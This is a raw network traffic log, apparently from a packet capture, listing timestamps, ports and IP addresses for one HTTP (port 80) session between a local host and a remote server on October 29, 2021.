Oct 29, 2021 20:50:10.843434095 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:10.843456030 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:10.843477964 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:10.843477964 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:10.843501091 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:10.843502045 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:10.843523026 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:10.843544960 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:10.843545914 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:10.843569994 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:10.843578100 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:10.843590975 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:10.843648911 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:10.894607067 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:10.894638062 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:10.894654036 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:10.894678116 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:10.894695997 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:10.894711018 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:10.894726992 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:10.894745111 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:10.894761086 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:10.894777060 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:10.894793034 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:10.894809961 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:10.894825935 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:10.894833088 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:10.894843102 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:10.894860029 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:10.894862890 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:10.894866943 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:10.894876957 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:10.894887924 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:10.894896030 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:10.894912958 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:10.894927025 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:10.894929886 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:10.894953966 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:10.894963026 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:10.894972086 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:10.894989967 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:10.894990921 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:10.895006895 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:10.895024061 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:10.895035982 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:10.895066023 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:10.895077944 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:10.895095110 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:10.895112038 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:10.895127058 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:10.895134926 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:10.895170927 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:10.914870024 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:10.914918900 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:10.914946079 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:10.914973021 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:10.914999008 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:10.915011883 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:10.915024996 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:10.915040016 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:10.915050983 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:10.915075064 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:10.915100098 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:10.915131092 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:10.915446997 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:10.915476084 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:10.915502071 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:10.915527105 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:10.915533066 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:10.915571928 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:10.946134090 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:10.946187019 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:10.946208000 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:10.946228981 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:10.946252108 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:10.946263075 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:10.946274996 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:10.946290970 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:10.946295977 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:10.946317911 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:10.946319103 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:10.946338892 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:10.946360111 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:10.946381092 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:10.946382046 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:10.946403027 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:10.946412086 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:10.946425915 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:10.946444988 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:10.946449041 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:10.946485043 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:10.955841064 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:10.955873966 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:10.955895901 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:10.955919027 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:10.955940008 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:10.955959082 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:10.955961943 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:10.955982924 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:10.956001997 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:10.956003904 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:10.956022978 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:10.956039906 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:10.956042051 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:10.956075907 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:10.956348896 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:10.956443071 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:10.956463099 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:10.956502914 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:10.956502914 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:10.956590891 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:10.956609964 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:10.956629992 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:10.956643105 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:10.956646919 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:10.956665039 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:10.956703901 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:10.956705093 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:10.956741095 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:10.956762075 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:10.956783056 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:10.956801891 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:10.956803083 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:10.956825018 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:10.966172934 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:10.966207027 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:10.966229916 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:10.966243029 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:10.966250896 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:10.966272116 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:10.966273069 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:10.966311932 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:10.997101068 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:10.997137070 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:10.997159958 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:10.997184992 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:10.997209072 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:10.997226954 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:10.997252941 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:10.997262955 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:10.997288942 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:10.997308016 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:10.997313023 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:10.997638941 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:10.997663021 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:10.997684002 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:10.997689962 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:10.997724056 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:10.997771025 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:10.997797012 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:10.997818947 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:10.997833967 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:10.997843981 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:10.997853041 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:10.997869015 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:10.997894049 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:10.997909069 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:10.997916937 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:10.997958899 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:10.997982025 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:10.997993946 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:10.998006105 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:10.998024940 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:10.998075962 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:10.999208927 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:11.007091045 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.007121086 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.007143974 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.007168055 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.007173061 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:11.007191896 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.007219076 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.007225037 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:11.007240057 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.007347107 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:11.038176060 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.038201094 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.038217068 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.038233995 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.038250923 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.038269997 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.038289070 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.038285017 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:11.038309097 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.038315058 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:11.038325071 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.038343906 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.038346052 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:11.038363934 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.038378954 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.038387060 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:11.038409948 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:11.039418936 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.039438009 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.039454937 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.039470911 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.039490938 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.039491892 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:11.039508104 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:11.039524078 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.039526939 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:11.039541960 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.039576054 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:11.039669037 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.039685965 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.041353941 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:11.048338890 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.048357964 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.048372984 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.048389912 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.048403978 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:11.048438072 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:11.048470020 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.048485994 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.048533916 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:11.048650026 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.048669100 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.048686028 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.048708916 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:11.080027103 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.080060959 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.080085039 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.080110073 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.080116987 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:11.080132961 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.080146074 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:11.080154896 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.080177069 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.080180883 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:11.080198050 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.080220938 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:11.080221891 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.080244064 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.080250025 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:11.080266953 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.080287933 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.080301046 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:11.080311060 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.080347061 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:11.081279039 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.081306934 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.081327915 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.081351042 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.081350088 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:11.081397057 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:11.081422091 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.081463099 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.081543922 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:11.089456081 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.089550018 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.089574099 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.089596987 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.089607000 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:11.089618921 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.089637041 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:11.089643955 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.089668036 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.089678049 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:11.089690924 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.089713097 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.089734077 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:11.089734077 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.089751005 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.089766979 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:11.121263027 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.121298075 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.121320009 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.121335983 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:11.121341944 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.121366024 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:11.121418953 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.121442080 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.121464014 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.121483088 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:11.121484995 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.121517897 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:11.121582985 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.121606112 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.121618986 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:11.121705055 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.121727943 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.121759892 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:11.121771097 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.122169018 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.122191906 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.122217894 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:11.122236967 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:11.122514009 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.122535944 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.122580051 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:11.123200893 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.123225927 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.123246908 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.123266935 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.123265982 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:11.123298883 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:11.123300076 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.123339891 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.123374939 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:11.123394966 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.123415947 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.123436928 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.123450041 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:11.123457909 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.123492956 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:11.123548031 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.123569965 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.123599052 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.123606920 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:11.123617887 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.123656988 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:11.162801981 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.162831068 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.162847042 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.162863970 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.162885904 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:11.162894964 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.162909985 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.162911892 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:11.162929058 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.162956953 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:11.162976980 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.163017035 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:11.163027048 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.163047075 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.163064957 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.163085938 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.163094997 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:11.163134098 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:11.163464069 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.163486958 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.163505077 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:11.163521051 CEST	80	49840	185.98.87.159	192.168.2.4
